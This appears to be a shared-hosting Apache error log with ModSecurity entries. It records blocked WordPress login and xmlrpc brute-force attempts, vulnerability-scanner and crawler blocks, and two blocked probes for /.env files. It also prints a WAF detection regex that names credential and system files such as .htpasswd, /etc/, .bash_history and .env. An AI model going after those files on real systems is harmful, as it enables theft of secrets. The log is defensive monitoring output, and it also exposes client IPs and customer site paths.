[Tue May 26 12:57:50.007847 2026] [core:error] [pid 470766:tid 470815] (13)Permission denied: [remote 74.7.227.172:34542] AH00132: file permissions deny server access: /home2/wrapmjh1/wpdev.wrapmachines.com/wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-solid-900.woff2, referer: https://wpdev.wrapmachines.com/
[Tue May 26 12:57:50.330112 2026] [security2:error] [pid 470766:tid 470997] [client 14.189.32.155:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLdejO_W1DqEcFHQ7V2wAAAGU"]
[Tue May 26 12:57:51.404941 2026] [security2:error] [pid 470766:tid 470953] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLdujO_W1DqEcFHQ7V8gAAADk"]
[Tue May 26 12:57:53.227611 2026] [security2:error] [pid 470766:tid 470971] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLeOjO_W1DqEcFHQ7WEwAAAEs"]
[Tue May 26 12:57:54.679644 2026] [security2:error] [pid 470766:tid 471010] [client 157.20.138.61:50932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLeujO_W1DqEcFHQ7WMwAAAHI"]
[Tue May 26 12:57:54.679762 2026] [security2:error] [pid 470766:tid 471010] [client 157.20.138.61:50932] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLeujO_W1DqEcFHQ7WMwAAAHI"]
[Tue May 26 12:57:54.726850 2026] [security2:error] [pid 470766:tid 471013] [client 172.225.181.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVLeujO_W1DqEcFHQ7WLwAAAHU"]
[Tue May 26 12:57:56.115069 2026] [security2:error] [pid 470766:tid 470934] [client 185.191.171.15:53746] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVLfOjO_W1DqEcFHQ7WSwAAACY"]
[Tue May 26 12:57:56.115229 2026] [security2:error] [pid 470766:tid 470934] [client 185.191.171.15:53746] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVLfOjO_W1DqEcFHQ7WSwAAACY"]
[Tue May 26 12:57:56.378204 2026] [security2:error] [pid 470766:tid 470993] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLe-jO_W1DqEcFHQ7WSQAAAGE"]
[Tue May 26 12:57:56.869123 2026] [core:crit] [pid 470766:tid 470948] (13)Permission denied: [client 40.77.167.63:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:57:58.591437 2026] [security2:error] [pid 470766:tid 470953] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLfujO_W1DqEcFHQ7WdAAAADk"]
[Tue May 26 12:58:01.244939 2026] [security2:error] [pid 470766:tid 470898] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLgOjO_W1DqEcFHQ7WjgAAAAI"]
[Tue May 26 12:58:04.040373 2026] [security2:error] [pid 470766:tid 470991] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLg-jO_W1DqEcFHQ7WugAAAF8"]
[Tue May 26 12:58:05.370430 2026] [security2:error] [pid 470766:tid 470899] [client 157.20.138.61:51292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLhejO_W1DqEcFHQ7W0gAAAAM"]
[Tue May 26 12:58:05.370596 2026] [security2:error] [pid 470766:tid 470899] [client 157.20.138.61:51292] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLhejO_W1DqEcFHQ7W0gAAAAM"]
[Tue May 26 12:58:06.028240 2026] [security2:error] [pid 470766:tid 470908] [client 62.60.130.231:60215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-login.php"] [unique_id "ahVLhejO_W1DqEcFHQ7W2AAAAAw"], referer: https://www.facebook.com/
[Tue May 26 12:58:06.369037 2026] [security2:error] [pid 470766:tid 470920] [client 62.60.130.231:58637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-login.php"] [unique_id "ahVLhujO_W1DqEcFHQ7W5gAAABg"], referer: https://wordpress.org/
[Tue May 26 12:58:06.793052 2026] [security2:error] [pid 470766:tid 471020] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLhujO_W1DqEcFHQ7W5QAAAHw"]
[Tue May 26 12:58:07.143156 2026] [security2:error] [pid 470766:tid 470926] [client 4.201.75.230:41927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.shankhanaad.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVLh-jO_W1DqEcFHQ7W8AAAAB4"]
[Tue May 26 12:58:07.192610 2026] [security2:error] [pid 470766:tid 471009] [client 62.60.130.231:60215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-login.php"] [unique_id "ahVLh-jO_W1DqEcFHQ7W8wAAAHE"]
[Tue May 26 12:58:08.048503 2026] [security2:error] [pid 470766:tid 470900] [client 74.7.228.15:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.houstontxmobilecovidlab.taotechservices.com"] [uri "/index.php"] [unique_id "ahVLh-jO_W1DqEcFHQ7W-QAAAAQ"]
[Tue May 26 12:58:08.049515 2026] [security2:error] [pid 470766:tid 470974] [client 74.7.228.15:36646] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.houstontxmobilecovidlab.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVLh-jO_W1DqEcFHQ7W9wAATno"]
[Tue May 26 12:58:11.341976 2026] [security2:error] [pid 470766:tid 470979] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVLi-jO_W1DqEcFHQ7XQAAAAFM"], referer: https://www.ucdc.co.in/
[Tue May 26 12:58:12.756826 2026] [security2:error] [pid 470766:tid 470901] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLjOjO_W1DqEcFHQ7XWQAAAAU"]
[Tue May 26 12:58:14.985832 2026] [security2:error] [pid 470766:tid 471017] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLjujO_W1DqEcFHQ7XiQAAAHk"]
[Tue May 26 12:58:15.780330 2026] [security2:error] [pid 470766:tid 470900] [client 157.20.138.61:51649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLj-jO_W1DqEcFHQ7XnwAAAAQ"]
[Tue May 26 12:58:15.780503 2026] [security2:error] [pid 470766:tid 470900] [client 157.20.138.61:51649] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLj-jO_W1DqEcFHQ7XnwAAAAQ"]
[Tue May 26 12:58:16.106679 2026] [security2:error] [pid 470766:tid 470912] [client 4.201.75.230:41930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.shankhanaad.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVLkOjO_W1DqEcFHQ7XpgAAABA"]
[Tue May 26 12:58:16.123324 2026] [security2:error] [pid 470766:tid 470970] [client 14.164.155.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLj-jO_W1DqEcFHQ7XngAAAEo"]
[Tue May 26 12:58:16.316956 2026] [security2:error] [pid 470766:tid 470804] [remote 172.194.139.254:14299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.139.194.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVLkOjO_W1DqEcFHQ7XqgAAByU"]
[Tue May 26 12:58:18.075644 2026] [security2:error] [pid 470766:tid 470965] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLkejO_W1DqEcFHQ7XvQAAAEU"]
[Tue May 26 12:58:18.467354 2026] [security2:error] [pid 470766:tid 470928] [client 51.68.111.218:18403] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "pestcontroldelhi.co.in"] [uri "/robots.txt"] [unique_id "ahVLkujO_W1DqEcFHQ7X0QAAACA"]
[Tue May 26 12:58:18.467490 2026] [security2:error] [pid 470766:tid 470928] [client 51.68.111.218:18403] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "pestcontroldelhi.co.in"] [uri "/robots.txt"] [unique_id "ahVLkujO_W1DqEcFHQ7X0QAAACA"]
[Tue May 26 12:58:19.347930 2026] [security2:error] [pid 470766:tid 470997] [client 216.26.238.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVLk-jO_W1DqEcFHQ7X4gAAAGU"], referer: https://anujtradingco.com/
[Tue May 26 12:58:20.851312 2026] [security2:error] [pid 470766:tid 470968] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLlOjO_W1DqEcFHQ7X9wAAAEg"]
[Tue May 26 12:58:22.833545 2026] [security2:error] [pid 470766:tid 470938] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLlujO_W1DqEcFHQ7YFgAAACo"]
[Tue May 26 12:58:25.297367 2026] [security2:error] [pid 470766:tid 470950] [client 92.50.32.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVLmOjO_W1DqEcFHQ7YQgAAADY"]
[Tue May 26 12:58:25.867420 2026] [security2:error] [pid 470766:tid 470959] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLmejO_W1DqEcFHQ7YTAAAAD8"]
[Tue May 26 12:58:26.369208 2026] [security2:error] [pid 470766:tid 470914] [client 157.20.138.61:52006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLmujO_W1DqEcFHQ7YYwAAABI"]
[Tue May 26 12:58:26.369339 2026] [security2:error] [pid 470766:tid 470914] [client 157.20.138.61:52006] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLmujO_W1DqEcFHQ7YYwAAABI"]
[Tue May 26 12:58:28.542554 2026] [security2:error] [pid 470766:tid 470956] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLnOjO_W1DqEcFHQ7YhQAAADw"]
[Tue May 26 12:58:30.597691 2026] [security2:error] [pid 470766:tid 471023] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLnujO_W1DqEcFHQ7YqwAAAH8"]
[Tue May 26 12:58:31.332712 2026] [security2:error] [pid 470766:tid 470779] [remote 173.249.21.166:42628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVLn-jO_W1DqEcFHQ7YtwAAfAw"]
[Tue May 26 12:58:33.803845 2026] [security2:error] [pid 470766:tid 470971] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLoejO_W1DqEcFHQ7Y2wAAAEs"]
[Tue May 26 12:58:36.349912 2026] [security2:error] [pid 470766:tid 470951] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLo-jO_W1DqEcFHQ7ZEQAAADc"]
[Tue May 26 12:58:36.999363 2026] [security2:error] [pid 470766:tid 470908] [client 157.20.138.61:52368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLpOjO_W1DqEcFHQ7ZJwAAAAw"]
[Tue May 26 12:58:36.999474 2026] [security2:error] [pid 470766:tid 470908] [client 157.20.138.61:52368] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLpOjO_W1DqEcFHQ7ZJwAAAAw"]
[Tue May 26 12:58:38.655675 2026] [security2:error] [pid 470766:tid 471006] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLpujO_W1DqEcFHQ7ZQQAAAG4"]
[Tue May 26 12:58:39.106033 2026] [security2:error] [pid 470766:tid 470952] [client 34.78.162.75:52162] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "208.91.198.85"] [uri "/"] [unique_id "ahVLp-jO_W1DqEcFHQ7ZSAAAADg"]
[Tue May 26 12:58:41.833864 2026] [security2:error] [pid 470766:tid 471005] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLqejO_W1DqEcFHQ7ZbwAAAG0"]
[Tue May 26 12:58:43.037378 2026] [core:crit] [pid 470766:tid 470937] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:58:43.396423 2026] [core:crit] [pid 470766:tid 471014] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:58:43.624988 2026] [core:crit] [pid 470766:tid 470918] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:58:44.436513 2026] [security2:error] [pid 470766:tid 470928] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLrOjO_W1DqEcFHQ7ZmgAAACA"]
[Tue May 26 12:58:45.161255 2026] [security2:error] [pid 470766:tid 470993] [client 74.7.230.59:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.support.mosykay.com"] [uri "/index.php"] [unique_id "ahVLrejO_W1DqEcFHQ7ZqQAAAGE"]
[Tue May 26 12:58:45.162126 2026] [security2:error] [pid 470766:tid 470975] [client 74.7.230.59:52476] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.support.mosykay.com"] [uri "/robots.txt"] [unique_id "ahVLrejO_W1DqEcFHQ7ZpwAAT1Y"]
[Tue May 26 12:58:46.457873 2026] [security2:error] [pid 470766:tid 470929] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLrujO_W1DqEcFHQ7ZxQAAACE"]
[Tue May 26 12:58:47.458798 2026] [security2:error] [pid 470766:tid 470995] [client 157.20.138.61:52730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLr-jO_W1DqEcFHQ7Z2QAAAGM"]
[Tue May 26 12:58:47.458923 2026] [security2:error] [pid 470766:tid 470995] [client 157.20.138.61:52730] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLr-jO_W1DqEcFHQ7Z2QAAAGM"]
[Tue May 26 12:58:48.140890 2026] [security2:error] [pid 470766:tid 470969] [client 223.109.255.206:38051] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVLsOjO_W1DqEcFHQ7Z4AAAAEk"], referer: http://pic.sogou.com
[Tue May 26 12:58:48.229493 2026] [security2:error] [pid 470766:tid 470909] [client 142.147.196.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVLr-jO_W1DqEcFHQ7Z3AAAAA0"]
[Tue May 26 12:58:48.725718 2026] [security2:error] [pid 470766:tid 471005] [client 157.48.246.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLsOjO_W1DqEcFHQ7Z5QAAAG0"]
[Tue May 26 12:58:49.728752 2026] [security2:error] [pid 470766:tid 470913] [client 176.65.139.229:54694] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.observance111.svijaykumar.in"] [uri "/.env"] [unique_id "ahVLsejO_W1DqEcFHQ7Z-gAAABE"]
[Tue May 26 12:58:49.776814 2026] [security2:error] [pid 470766:tid 471000] [client 176.65.139.236:48030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.rabbanitradingcompany.svijaykumar.in"] [uri "/.env"] [unique_id "ahVLsejO_W1DqEcFHQ7Z-wAAAGg"]
[Tue May 26 12:58:50.026088 2026] [security2:error] [pid 470766:tid 470957] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLsejO_W1DqEcFHQ7Z-QAAAD0"]
